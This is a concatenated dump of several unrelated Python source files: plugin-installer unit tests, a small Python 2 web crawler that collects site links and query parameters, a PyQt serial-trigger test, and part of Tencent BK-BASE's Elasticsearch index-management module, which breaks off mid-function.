must share the name of the plugin archive)"""
return test_plugin_installer.TestPluginInstaller.local_plugin('badname_podmodel.zip')
@property
def badnomodule_plugin_loc(self):
"""Returns the full path to a known bad plugin (root plugin module
must exist)"""
return test_plugin_installer.TestPluginInstaller.local_plugin('badnomodule_podmodel.zip')
@property
def badreadme_plugin_loc(self):
"""Returns the full path to a known bad plugin (plugin archive must
have a properly-named README file)"""
return test_plugin_installer.TestPluginInstaller.local_plugin('badreadme_podmodel.zip')
@property
def badnoreadme_plugin_loc(self):
"""Returns the full path to a known bad plugin (plugin archive must
have a README file)"""
return test_plugin_installer.TestPluginInstaller.local_plugin('badnoreadme_podmodel.zip')
@property
def badstructure_plugin_loc(self):
"""Returns the full path to a known bad plugin (plugin may only have
a .py module and README file in the root)"""
return test_plugin_installer.TestPluginInstaller.local_plugin('badstructure_podmodel.zip')
def test_init(self):
"""Verify correct initialization"""
zip_pword = random.sample(string.ascii_letters, 9)
a_plugin_fetcher = podmodel_installer.PODModelInstaller(self.good_plugin_loc,
zip_password=zip_pword)
self.assertEqual(self.good_plugin_loc, a_plugin_fetcher.plugin_url)
self.assertEqual(zip_pword, a_plugin_fetcher.zip_password)
self.assertIsNone(a_plugin_fetcher.plugin)
self.assertIsNone(a_plugin_fetcher.plugin_contents)
def test_fetch(self):
"""Verify retrieval of the plugin archive"""
a_plugin_fetcher = podmodel_installer.PODModelInstaller(self.good_plugin_loc)
a_plugin_fetcher.fetch()
with open(self.good_plugin_loc, 'rb') as fidin:
local_plugin = fidin.read()
self.assertEqual(local_plugin, a_plugin_fetcher.plugin)
self.assertEqual(cStringIO.StringIO(local_plugin).getvalue(),
a_plugin_fetcher.plugin_contents.getvalue())
def test_verify_plugin_bad_folders(self):
"""Verify that verify_plugin method returns False if the plugin appears invalid due
to improperly-named folders."""
bad_plugin_installer = podmodel_installer.PODModelInstaller(self.badfolders_plugin_loc)
bad_plugin_installer.fetch()
self.assertFalse(bad_plugin_installer.verify_plugin())
def test_verify_plugin_bad_name(self):
"""Verify that verify_plugin method returns False if the plugin appears invalid due
to improperly-named plugin module."""
bad_plugin_installer = podmodel_installer.PODModelInstaller(self.badname_plugin_loc)
bad_plugin_installer.fetch()
self.assertFalse(bad_plugin_installer.verify_plugin())
def test_verify_plugin_bad_module(self):
"""Verify that verify_plugin method returns False if the plugin appears invalid due
to improperly-named plugin module."""
bad_plugin_installer = podmodel_installer.PODModelInstaller(self.badnomodule_plugin_loc)
bad_plugin_installer.fetch()
self.assertFalse(bad_plugin_installer.verify_plugin())
def test_verify_plugin_bad_readme(self):
"""Verify that verify_plugin method returns False if the plugin appears invalid due
to improperly-named README."""
bad_plugin_installer = podmodel_installer.PODModelInstaller(self.badreadme_plugin_loc)
bad_plugin_installer.fetch()
self.assertFalse(bad_plugin_installer.verify_plugin())
def test_verify_plugin_bad_noreadme(self):
"""Verify that verify_plugin method returns False if the plugin appears invalid due
to not having a README file in the root."""
bad_plugin_installer = podmodel_installer.PODModelInstaller(self.badnoreadme_plugin_loc)
bad_plugin_installer.fetch()
self.assertFalse(bad_plugin_installer.verify_plugin())
def test_verify_plugin_bad_structure(self):
"""Verify that verify_plugin method returns False if the plugin appears invalid due
to having an invalid structure (support files in sub-folder; only module.py and
README allowed in root)"""
bad_plugin_installer = podmodel_installer.PODModelInstaller(self.badstructure_plugin_loc)
bad_plugin_installer.fetch()
self.assertFalse(bad_plugin_installer.verify_plugin())
def test_install_plugin(self):
"""Verify install_plugin method correctly installs a plugin; also
verifies handling of encrypted ZIPs"""
sample_plugin_url = TestPODModelInstaller.local_plugin('good_podmodel.zip')
installed_plugin_name = os.path.join(pathfinder.podmodels_path(), 'good_podmodel.py')
installer = podmodel_installer.PODModelInstaller(sample_plugin_url)
installer.fetch()
self.assertTrue(installer.verify_plugin())
install_success = installer.install_plugin()
self.assertTrue(os.path.exists(installed_plugin_name))
self.assertTrue(install_success)
# Clean up - attempt to remove the sample POD Model if it already exists
podmodel_files = zipper.UnZipper(sample_plugin_url).list_contents()
for each_file in podmodel_files:
full_path = os.path.join(pathfinder.podmodels_path(), each_file)
if os.path.exists(full_path):
try:
os.remove(full_path)
except WindowsError: # file in use
return
class TestRemotePODModelInstaller(test_plugin_installer.TestRemotePluginInstaller):
"""Tests the RemotePODModelInstaller class"""
@property
def good_plugin(self):
"""Returns the path and filename to the known good plugin"""
return TestRemotePODModelInstaller.local_plugin('good_podmodel.zip')
@property
def good_plugin_url(self):
"""Returns the URL to the known good plugin"""
return TestRemotePODModelInstaller.plugin_url('good_podmodel.zip')
@property
def badfolders_plugin_url(self):
"""Returns the URL to a known bad plugin (support folders must
share name of the plugin archive)"""
return TestRemotePODModelInstaller.plugin_url('badfolders_podmodel.zip')
@property
def badname_plugin_url(self):
"""Returns the URL to a known bad plugin (root plugin module
must share the name of the plugin archive)"""
return TestRemotePODModelInstaller.plugin_url('badname_podmodel.zip')
@property
def badnomodule_plugin_url(self):
"""Returns the URL to a known bad plugin (root plugin module
must exist)"""
return TestRemotePODModelInstaller.plugin_url('badnomodule_podmodel.zip')
@property
def badreadme_plugin_url(self):
"""Returns the URL to a known bad plugin (plugin archive must
have a properly-named README file)"""
return TestRemotePODModelInstaller.plugin_url('badreadme_podmodel.zip')
@property
def badnoreadme_plugin_url(self):
"""Returns the URL to a known bad plugin (plugin archive must
have a README file)"""
return TestRemotePODModelInstaller.plugin_url('badnoreadme_podmodel.zip')
@property
def badstructure_plugin_url(self):
"""Returns the URL to a known bad plugin (plugin may only have
a .py module and README file in the root)"""
return TestRemotePODModelInstaller.plugin_url('badstructure_podmodel.zip')
def setUp(self):
"""Creates a SimpleHTTPServer instance to handle a single
request. Use self.server_thd.start() to initiate."""
#self.server_thd = threading.Thread(target=TestRemotePluginInstaller.httpd.handle_request)
self.good_plugin_installer = podmodel_installer.RemotePODModelInstaller(self.good_plugin_url)
self.plugin_reader = zipper.UnZipper(self.good_plugin)
def test_init(self):
"""Verify correct initialization"""
uname = random.sample(string.ascii_letters, 7)
pword = random.sample(string.ascii_letters, 11)
zip_pword = random.sample(string.ascii_letters, 9)
a_plugin_fetcher = podmodel_installer.RemotePODModelInstaller(self.good_plugin_url,
username=uname,
password=pword
, zip_password=zip_pword)
self.assertEqual(self.good_plugin_url, a_plugin_fetcher.plugin_url)
self.assertEqual(uname, a_plugin_fetcher.plugin_url_username)
self.assertEqual(pword, a_plugin_fetcher.plugin_url_password)
self.assertEqual(zip_pword, a_plugin_fetcher.zip_password)
self.assertIsNone(a_plugin_fetcher.plugin)
self.assertIsNone(a_plugin_fetcher.plugin_contents)
def test_fetch(self):
"""Verify fetching a plugin"""
self.good_plugin_installer.fetch()
with open(self.good_plugin, 'rb') as fidin:
local_plugin = fidin.read()
self.assertEqual(local_plugin, self.good_plugin_installer.plugin)
self.assertEqual(cStringIO.StringIO(local_plugin).getvalue(),
self.good_plugin_installer.plugin_contents.getvalue())
def test_install_plugin(self):
"""Verify install_plugin method correctly installs a plugin; also
verifies handling of encrypted ZIPs"""
sample_plugin_url = TestRemotePODModelInstaller.plugin_url('good_podmodel.zip')
installed_plugin_name = os.path.join(pathfinder.podmodels_path(), 'good_podmodel.py')
installed_plugin_cfg = os.path.join(pathfinder.podmodels_path(), 'good_podmodel.cfg')
installer = podmodel_installer.RemotePODModelInstaller(sample_plugin_url)
installer.fetch()
self.assertTrue(installer.verify_plugin())
install_success = installer.install_plugin()
self.assertTrue(os.path.exists(installed_plugin_name))
self.assertTrue(os.path.exists(installed_plugin_cfg))
self.assertTrue(install_success)
# Clean up - attempt to remove the sample plugin if it already exists
for mdl_file in [installed_plugin_name, installed_plugin_cfg]:
if os.path.exists(mdl_file):
try:
os.remove(mdl_file)
except WindowsError: # file in use
return
if __name__ == "__main__":
unittest.main()
|
Spider_bak.py
|
import requests
import bs4
import Queue
import re
import threading
class Spider():
def __init__(self):
self.url = None
self._WebRootPage = None
self.UrlList = []
self._ParmList = {}
self._DuplicateUrlList = []
self.Threads = 10
self._Counter = 0
self.Protocol = 'http'
self.queue = Queue.Queue()
def SpiderSite(self):
if self.url:
if not self.Protocol:
print '[!] Protocol not specified, using HTTP by default.'
self.Protocol = 'http'
self._WebRootPage = '%s://%s/' %(self.Protocol, self.url)
else:
print '[!] Error getting site: URL not specified.'
UrlList = self.GetHomepage()
Robots = self.GetRobots()
for url in Robots:
UrlList.append(url)
print '[+] Fetched %s urls from robots.' %(str(len(Robots)))
UrlList = self.CheckUrlList(UrlList)
self.UrlList = self.LoadPage(UrlList)
while self.queue.qsize():
if self._Counter < self.Threads:
thread = threading.Thread(target=self.GetPage, args=[self.queue.get()])
thread.start()
self._Counter += 1
return self.UrlList
def GetHomepage(self):
try:
resp = requests.get(self._WebRootPage).text
UrlList = self.GetPageUrl(resp)
UrlList = self.CheckUrlList(UrlList)
except Exception, e:
print '[!] Error getting homepage: %s' %(str(e))
UrlList = ''
return UrlList
def GetPageUrl(self, page): # Fetch URL from page, Return List.
UrlList = []
try:
soup = bs4.BeautifulSoup(page)
for item in soup.findAll('a'):
UrlList.append(item.get('href').lstrip('/'))
print '[*] Fetched %s urls.' %(str(len(UrlList)))
except Exception, e:
print '[!] Error fetching url: %s.' %(str(e))
return UrlList
def CheckUrl(self, url): # Get string URL, Check avilable URL, Return a url.
try:
if re.findall(r'^(?![/]{2}|http[s]?://).*', url):
pass
else:
if re.findall(self.url, url):
url = re.sub('^([/]{2}|http[s]?://)%s' % (self.url.replace('.', '\.')), '', url)
url = url.lstrip('/')
else:
url = None
if url:
if re.findall('\.jpg|\.gif|\.jpeg|\.js|\.pdf|\.doc|\.png|\.bmp|\.css|\.xml|\.xls|\.json|\.ppt|\.psd', url):
url = None
except Exception, e:
print '[!] Error checking url: %s, resuming next' %(str(e))
url = None
return url
def GetPage(self, url): # Fetch page.
try:
resp = requests.get(self._WebRootPage+url).text
UrlList = self.GetPageUrl(resp)
UrlList = self.CheckUrlList(UrlList)
self.LoadPage(UrlList)
except Exception, e:
print '[!] Error getting page: %s' %(str(e))
UrlList = []
self._Counter -= 1
return UrlList
def CheckUrlList(self, UrlList): # Get a literable list, Check availability, Return a list.
NewUrlList = []
for url in UrlList:
url = self.CheckUrl(url)
if url and url != u'#' and url != u'':
NewUrlList.append(url)
return NewUrlList
def LoadPage(self, page): # Load pages without other actions but check duplicate and store into queue and urllist
NewUrlList = []
UrlList = self.CheckDuplicate(page)
for page in UrlList:
self.queue.put(page)
NewUrlList.append(page)
return NewUrlList
def CheckDuplicate(self, list): # Check urls, feed them into duplicate list.
UrlList = []
PageList = []
for url in list:
PageUrl = url.split('?')[0]
if PageUrl not in PageList:
PageList.append(PageUrl)
pass
else:
continue
if url not in self._DuplicateUrlList:
UrlList.append(url)
self._DuplicateUrlList.append(url)
return UrlList
def GetRobots(self):
UrlList = []
try:
resp = requests.get(self._WebRootPage).text
UrlList = re.findall('[Aa]?llow: /(.*)$', resp)
except Exception, e:
print '[!] Failed to fetch robots: %s' %(str(e))
return UrlList
def CheckParms(self): # Check pages, fetch parms, stat parms, return in a dict. dict will be like # List format: {url:{parm:val}}
ParmDict = {}
try:
for url in self.UrlList:
url, parm = re.split('\?', url)
if url == u'' or '' or None:
url = '/'
if '&' in parm:
parmList = parm.split('&')
else:
continue
for parm in parmList:
param, value = parm.split('=')
if url not in ParmDict:
ParmDict[url] = {}
if not ParmDict[url].has_key(param):
ParmDict[url][param] = value
print ParmDict
return
except Exception, e:
print '[!] Error checking parameter: %s.' %(e)
def test():
spider = Spider()
spider.url = 'www.katun.me'
UrlList = spider.SpiderSite()
print '*' + '-' * 30 + '*'
for url in UrlList:
print '[+] Fetched: %s' %(str(url))
|
test_prf.py
|
from PyQt5.QtTest import QTest
from PyQt5.QtCore import Qt
from qttasks.prf import PrettyWidget
from time import sleep
from serial import serial_for_url, SerialException
from pathlib import Path
from struct import unpack
import threading
class SerialThreading(object):
def __init__(self):
self.triggers_log = Path('triggers.log').resolve()
self.port_trigger = serial_for_url('loop://', timeout=0.1)
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
with self.triggers_log.open('wb') as f:
while True:
out = self.port_trigger.read()
if out != b'':
f.write(out)
def notest_prf_exit(qtbot):
tr = SerialThreading()
w = PrettyWidget(port_trigger=tr.port_trigger)
qtbot.addWidget(w)
sleep(1)
qtbot.keyEvent(
QTest.Click,
w,
Qt.Key_Escape,
)
with tr.triggers_log.open('rb') as f:
val = f.read()
assert unpack('<' + len(val) * 'B', val) == (250, 251)
def notest_prf_exit_after_start(qtbot):
tr = SerialThreading()
w = PrettyWidget(port_trigger=tr.port_trigger)
qtbot.addWidget(w)
qtbot.keyEvent(
QTest.Click,
w,
Qt.Key_Enter,
)
w.start()
sleep(5)
w.check_time()
sleep(5)
qtbot.keyEvent(
QTest.Click,
w,
Qt.Key_Escape,
)
sleep(2)
with tr.triggers_log.open('rb') as f:
val = f.read()
assert unpack('<' + len(val) * 'B', val) == (250, 251)
|
es.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import json
import re
import threading
import time
import requests
from common.base_crypt import BaseCrypt
from common.log import logger
from datahub.common.const import (
ACTIONS,
ADD,
ALIAS,
ALLOCATION,
ANALYZED_FIELDS,
CLUSTER_NAME,
CLUSTER_TYPE,
CONNECTION_INFO,
DATE,
DATE_FIELDS,
DOC_VALUES,
DOC_VALUES_FIELDS,
DOUBLE,
DTEVENTTIME,
DTEVENTTIMESTAMP,
ENABLE_REPLICA,
ES,
ES_CONF,
ES_FIELDS,
EXPIRES,
FAILED,
FALSE,
FIELD_NAME,
FIELD_TYPE,
FIELDS,
FLOAT,
HAS_REPLICA,
HOST,
INCLUDE,
INCLUDE_IN_ALL,
INDEX,
INDICES,
INFO,
INT,
INTEGER,
JSON_FIELDS,
JSON_HEADERS,
KEYWORD,
LONG,
MAPPINGS,
NUMBER_OF_REPLICAS,
OBJECT,
ORDER,
PASSWORD,
PORT,
PROPERTIES,
REMOVE,
RESULT_TABLE_ID,
RESULT_TABLE_NAME,
ROUTING,
RT_CONF,
RT_FIELDS,
SAMPLE,
SETTINGS,
STATUS,
STORAGE_CLUSTER,
STORAGE_CONFIG,
STORAGES,
STORE_SIZE,
STRING,
SUCCESS,
TAG,
TEXT,
TOP,
TRUE,
TYPE,
USER,
VERSION,
)
from datahub.storekit import model_manager, util
from datahub.storekit.exceptions import (
ClusterNotFoundException,
EsBadIndexError,
EsRestRequestError,
RtStorageNotExistsError,
)
from datahub.storekit.settings import (
AUTO_CREATE_FIELD,
DOCS_LIMIT_PER_SHARD,
ES_MAINTAIN_TIMEOUT,
EXCLUDE_ES_CLUSTER,
FORCE_SPLIT_DAYS,
HAS_COLD_NODES,
HOT_INDEX_SAVE_DAYS,
HTTP_REQUEST_TIMEOUT,
INDEX_SPLIT_THRESHOLD_IN_BYTE,
INITIAL_SHARD_MAX_SIZE_IN_BYTE,
INITIAL_SHARD_NUM,
MAX_SHARD_NUM,
NODE_HAS_TAG,
REPLICA_NUM,
RESERVED_INDEX_NUM,
RTX_RECEIVER,
RUN_VERSION,
SKIP_ES_INDEX_PREFIX,
SKIP_RT_FIELDS,
TAG_COLD,
TAG_HOT,
TOTAL_SHARDS_PER_NODE,
VERSION_IEOD_NAME,
)
def initialize(rt_info):
"""
初始化rt的es存储,包含创建索引、生成alias等操作
:param rt_info: rt的字段和配置信息
:return: 初始化操作结果
"""
return prepare(rt_info)
def info(rt_info):
"""
获取rt的es存储相关信息,包含索引列表、别名列表等信息
:param rt_info: rt的字段和配置信息
:return: rt的es相关信息
"""
es = rt_info[STORAGES][ES]
es[INFO] = {INDICES: [], MAPPINGS: {}, SETTINGS: {}, SAMPLE: {}}
rt_id_lower = rt_info[RESULT_TABLE_ID].lower()
# 获取索引列表,以及最新的索引的mapping
es_addr, es_auth = parse_es_connection_info(rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO])
# es中rt对应的索引命名规则为 rt_id + _ + yyyyMMdd + 编号,编号从00到99
indices = _get_es_indices(es_addr, es_auth, rt_id_lower) # es中索引名称需为小写字母
valid_rt_indices, _ = _get_valid_rt_indices(indices)
if rt_id_lower in valid_rt_indices:
es[INFO][INDICES] = valid_rt_indices[rt_id_lower]
max_index_name = valid_rt_indices[rt_id_lower][0]
es[INFO][MAPPINGS] = _get_index_mapping_from_es(es_addr, es_auth, max_index_name)
es[INFO][SETTINGS] = _get_index_settings_from_es(es_addr, es_auth, max_index_name)
es[INFO][SAMPLE] = _get_sample_data_from_es(es_addr, es_auth, max_index_name)
return es
def alter(rt_info):
"""
修改rt的es存储相关信息,有可能需要创建新的索引,以及别名指向
:param rt_info: rt的字段和配置信息
:return: rt的es存储的变更结果
"""
return prepare(rt_info)
def delete(rt_info):
"""
删除rt的es存储相关配置,以及对应的索引和数据
:param rt_info: rt的字段和配置信息
:return: rt的es存储清理结果
"""
rt_id_lower = rt_info[RESULT_TABLE_ID].lower()
es_addr, es_auth = parse_es_connection_info(rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO])
# es中rt对应的索引命名规则为 rt_id + _ + yyyyMMdd + 编号,编号从00到99
indices = _get_es_indices(es_addr, es_auth, rt_id_lower) # es中索引名称需为小写字母
valid_rt_indices, _ = _get_valid_rt_indices(indices)
if rt_id_lower in valid_rt_indices:
logger.info(f"{es_addr}: going to delete indices {valid_rt_indices[rt_id_lower]}")
_delete_index(es_addr, es_auth, ",".join(valid_rt_indices[rt_id_lower]))
return True
def prepare(rt_info, force_create=False, force_shard_num=INITIAL_SHARD_NUM):
"""
准备rt的es存储,这里可能是初始化,或者schema变化后的创建,或者不需要做任何事情
:param force_shard_num: 强制分裂时指定分片数
:param rt_info: rt的字段和配置信息
:param force_create: 强制创建新索引
:return: rt的es存储准备的结果
"""
# 获取es集群的信息
rt_id_lower = rt_info[RESULT_TABLE_ID].lower()
conn_info = rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO]
es_addr, es_auth = parse_es_connection_info(conn_info)
# es中rt对应的索引命名规则为 rt_id + _ + yyyyMMdd + 编号,编号从00到99
indices = _get_es_indices(es_addr, es_auth, rt_id_lower) # es中索引名称需为小写字母
valid_rt_indices, _ = _get_valid_rt_indices(indices)
new_index_name = _get_new_index_name(rt_id_lower) # 默认新建的索引名称
shard, init_shard_size, max_shard_num, shard_docs_limit, total_shards_per_node = _get_init_shard_param(
conn_info
) # 默认按照最小的分片数量创建
need_create_index = False # 默认无需创建索引
if rt_id_lower in indices:
# 不合法的索引名称,此时需要通知管理员手动处理这种场景
msg = f"{es_addr}: unable to create index for {rt_id_lower} as index name is the same as alias"
logger.warning(msg)
util.wechat_msg(RTX_RECEIVER, msg)
raise EsBadIndexError(message_kv={"msg": rt_id_lower})
elif rt_id_lower in valid_rt_indices:
# rt对应的索引已经存在,对比是否发生schema变化,如果有变化,则新创建索引
max_index_name = valid_rt_indices[rt_id_lower][0]
json_mapping = _get_index_mapping_from_es(es_addr, es_auth, max_index_name)
logger.info(f"{es_addr}: {rt_id_lower} mapping in {max_index_name} is {json.dumps(json_mapping)}")
new_index_name = _get_new_index_name(rt_id_lower, max_index_name)
current_replica = _get_index_replica(es_addr, es_auth, max_index_name)
if _is_schema_changed(rt_info, json_mapping) or _is_replica_changed(rt_info, current_replica):
need_create_index = True
index_size = _get_index_size(es_addr, es_auth, max_index_name)
shard = shard if index_size < init_shard_size else max_shard_num
else:
logger.info(f"{es_addr}: schema unchanged for {rt_id_lower}, use {max_index_name}")
else:
need_create_index = True # rt对应的索引不存在,需要创建
if need_create_index or force_create:
shard = force_shard_num if force_create else shard
mapping = _construct_mapping(rt_info, shard, TAG_HOT, total_shards_per_node)
logger.info(f"{es_addr}: {rt_id_lower} create index {new_index_name} with mapping {mapping}")
return _create_es_index_in_cluster(rt_id_lower, es_addr, es_auth, new_index_name, mapping)
return True
def check_schema(rt_info):
"""
对比rt的schema和es中索引的schema,找出不一致的地方。rt字段类型有int/long/double/string,
es中有text/keyword/integer/long/double/object等
:param rt_info: rt的配置信息
:return: schema不一致的地方
"""
result = {RT_CONF: {}, RT_FIELDS: {}, ES_CONF: {}, ES_FIELDS: {}}
# 获取es集群的信息
rt_id_lower = rt_info[RESULT_TABLE_ID].lower()
es_addr, es_auth = parse_es_connection_info(rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO])
result[RT_CONF] = _trans_fields_to_es_conf(rt_info[FIELDS], json.loads(rt_info[STORAGES][ES][STORAGE_CONFIG]))
for field in rt_info[FIELDS]:
result[RT_FIELDS][field[FIELD_NAME]] = field[FIELD_TYPE]
# es中rt对应的索引命名规则为 rt_id + _ + yyyyMMdd + 编号,编号从00到99
indices = _get_es_indices(es_addr, es_auth, rt_id_lower) # es中索引名称需为小写字母
valid_rt_indices, _ = _get_valid_rt_indices(indices)
if rt_id_lower in valid_rt_indices:
max_index_name = valid_rt_indices[rt_id_lower][0]
json_mapping = _get_index_mapping_from_es(es_addr, es_auth, max_index_name)
version = rt_info[STORAGES][ES][STORAGE_CLUSTER][VERSION]
index_type = rt_info[RESULT_TABLE_NAME].lower() # index_type即为rt的result_table_name字段
properties = json_mapping if _extract_big_version(version) >= 7 else json_mapping[index_type]
result[ES_CONF] = _trans_mapping_to_es_conf(properties, version)
field_props = properties[PROPERTIES]
for field in field_props:
result[ES_FIELDS][field] = field_props[field][TYPE]
return result
def maintain(rt_info):
"""
维护rt的es存储,按照规则新建es的索引,对索引增加别名,切换别名指向等等。
:param rt_info: rt的字段和配置信息
:return: 维护rt的es存储的结果
"""
rt_id_lower = rt_info[RESULT_TABLE_ID].lower()
es_addr, es_auth = parse_es_connection_info(rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO])
# es中rt对应的索引命名规则为 rt_id + _ + yyyyMMdd + 编号,编号从00到99
indices = _get_es_indices(es_addr, es_auth, rt_id_lower) # es中索引名称需为小写字母
valid_rt_indices, _ = _get_valid_rt_indices(indices)
if rt_id_lower in valid_rt_indices:
_maintain_rt_indices(rt_info, valid_rt_indices[rt_id_lower], es_addr, es_auth)
return True
def maintain_all_rts():
"""
维护系统中所有rt的es存储
:return: 维护所有rt的es存储的结果
"""
# 获取所有es集群信息,排除非用户数据的es集群
es_clusters = model_manager.get_cluster_objs_by_type(ES)
# 按照es集群并发执行,以便加速维护任务,现网每天第一次执行涉及很多索引创建,需耗时2小时左右。
check_threads = []
for es_cluster in es_clusters:
if es_cluster.cluster_name in EXCLUDE_ES_CLUSTER:
continue # 跳过非用户数据的es集群
# 获取es集群中的索引列表
es_addr, es_auth = parse_es_connection_info(es_cluster.connection_info)
check_cluster_thread = threading.Thread(
target=_maintain_es_cluster, name=es_cluster.cluster_name, args=(es_cluster.cluster_name, es_addr, es_auth)
)
# 设置线程为守护线程,主线程结束后,结束子线程
check_cluster_thread.setDaemon(True)
check_threads.append(check_cluster_thread)
check_cluster_thread.start()
# join所有线程,等待所有集群检查都执行完毕
# 设置超时时间,防止集群出现问题,一直阻塞,导致后续集群维护任务等待
for th in check_threads:
th.join(timeout=ES_MAINTAIN_TIMEOUT)
return True
def clusters():
"""
获取es存储集群列表
:return: es存储集群列表
"""
result = model_manager.get_storage_cluster_configs_by_type(ES)
return result
def get_cluster_info(es_addr, es_auth):
"""
获取es索引的settings设置
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:return: es集群信息
"""
res = requests.get(f"http://{es_addr}/_cluster/stats", auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
if res.status_code == 200:
return res.json()
else:
logger.warning(f"{es_addr}: get es cluster info failed. {res.status_code} {res.text}")
raise EsRestRequestError(message_kv={"msg": res.text})
def parse_es_connection_info(connection_info):
"""
解析es集群的连接串,将es集群地址和鉴权信息返回
:param connection_info: es集群的连接串配置
:return: 元组,包含es集群地址和鉴权信息。
"""
es_conn = json.loads(connection_info)
es_addr = f"{es_conn[HOST]}:{es_conn[PORT]}"
if es_conn["enable_auth"]:
es_conn[PASSWORD] = BaseCrypt.bk_crypt().decrypt(es_conn[PASSWORD])
es_auth = (es_conn[USER], es_conn[PASSWORD])
return es_addr, es_auth
def _get_init_shard_param(connection_info):
"""
解析es集群的连接串,将es集群的初始shard数返回
:param connection_info: es集群的连接串配置
:return: 初始shard数。
"""
es_conn = json.loads(connection_info)
init_shard_num = es_conn.get("init_shard_num", INITIAL_SHARD_NUM)
init_shard_size = es_conn.get("init_shard_size", INITIAL_SHARD_MAX_SIZE_IN_BYTE)
max_shard_num = es_conn.get("max_shard_num", MAX_SHARD_NUM)
shard_docs_limit = (
es_conn["shard_docs_limit"]
if ("shard_docs_limit" in es_conn and es_conn["shard_docs_limit"] < DOCS_LIMIT_PER_SHARD)
else DOCS_LIMIT_PER_SHARD
)
total_shards_per_node = es_conn.get("total_shards_per_node", TOTAL_SHARDS_PER_NODE)
return init_shard_num, init_shard_size, max_shard_num, shard_docs_limit, total_shards_per_node
def _get_hot_save_days(connection_info):
"""
解析es集群的连接串,将es集群的热索引保留天数返回
:param connection_info: es集群的连接串配置
:return: 热索引保留天数。
"""
es_conn = json.loads(connection_info)
hot_save_days = es_conn["hot_save_days"] if "hot_save_days" in es_conn else HOT_INDEX_SAVE_DAYS
return hot_save_days
def _get_has_cold_nodes(connection_info):
"""
解析es集群的连接串,获取集群是否有冷节点
:param connection_info: es集群的连接串配置
:return: 集群是否有冷节点。
"""
es_conn = json.loads(connection_info)
has_cold_nodes = es_conn.get("has_cold_nodes", HAS_COLD_NODES)
return has_cold_nodes
def _get_split_index_condition(connection_info):
"""
解析es集群的连接串,将es集群的index分裂条件返回
:param connection_info: es集群的连接串配置
:return: 索引的分裂条件。
"""
es_conn = json.loads(connection_info)
index_split_threshold_in_byte = (
es_conn["index_split_threshold_in_byte"]
if "index_split_threshold_in_byte" in es_conn
else INDEX_SPLIT_THRESHOLD_IN_BYTE
)
force_split_days = es_conn["force_split_days"] if "force_split_days" in es_conn else FORCE_SPLIT_DAYS
return index_split_threshold_in_byte, force_split_days
def _maintain_es_cluster(es_cluster_name, es_addr, es_auth):
"""
维护指定的es集群中的索引列表
:param es_cluster_name: es集群名称
:param es_addr: es集群地址
:param es_auth: es鉴权信息
"""
# 获取es集群中的索引列表
indices = _get_es_indices(es_addr, es_auth)
valid_rt_indices, bad_indices = _get_valid_rt_indices(indices)
if bad_indices:
logger.info(f"{es_addr}: bad indices {json.dumps(bad_indices)}")
maintain_failed = []
# 逐个rt进行维护,需注意rt是否还包含es存储,且存储的集群没有发生切换
logger.info(f"{es_addr}: es maintain started for {es_cluster_name}")
for rt_id_lower, sort_index_list in list(valid_rt_indices.items()):
try:
rt_info = util.get_rt_info(rt_id_lower)
if rt_info and ES in rt_info[STORAGES]:
rt_es_cluster_name = rt_info[STORAGES][ES][STORAGE_CLUSTER][CLUSTER_NAME]
if rt_es_cluster_name != es_cluster_name:
logger.warning(
f"{es_addr}: rt es cluster changed to {rt_es_cluster_name}, unable to maintain "
f"{json.dumps(sort_index_list)}"
)
else:
_maintain_rt_indices(rt_info, sort_index_list, es_addr, es_auth)
else:
# 如果rt删除了es节点,那么这段废弃数据将永远不会被删除
raise RtStorageNotExistsError(message_kv={RESULT_TABLE_ID: rt_id_lower, TYPE: ES})
except Exception:
logger.warning(f"{es_addr}: failed to maintain indices {json.dumps(sort_index_list)}.", exc_info=True)
maintain_failed.append(sort_index_list)
logger.info(
f"{es_addr}: es maintain finished for {len(list(valid_rt_indices.keys()))} rts, failed are "
f"{json.dumps(maintain_failed)}"
)
def _maintain_rt_indices(rt_info, sort_index_list, es_addr, es_auth):
"""
维护rt对应的索引列表
:param rt_info: rt的配置信息
:param sort_index_list: rt的es索引列表,倒序排列
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:return: 维护结果
"""
rt_id_lower = rt_info[RESULT_TABLE_ID].lower()
logger.info(f"{es_addr}: going to maintain indices {json.dumps(sort_index_list)}")
# 保留至少1个索引,删除超出过期时间所有索引,维护索引别名
indices_to_delete = _expired_index_list(rt_id_lower, rt_info[STORAGES][ES][EXPIRES], sort_index_list)
if indices_to_delete:
logger.info(f"{es_addr}: going to delete indices {json.dumps(indices_to_delete)}")
_delete_index(es_addr, es_auth, ",".join(indices_to_delete))
# 判断是否需要分裂(500G,或者7天,或者docs超出限制)
max_index_name = sort_index_list[0]
index_size = _get_index_size(es_addr, es_auth, max_index_name)
# 无论是否需要分裂索引,都需要在当前最大索引上加上当天的别名指向,因为部分当天的日志已写入此索引
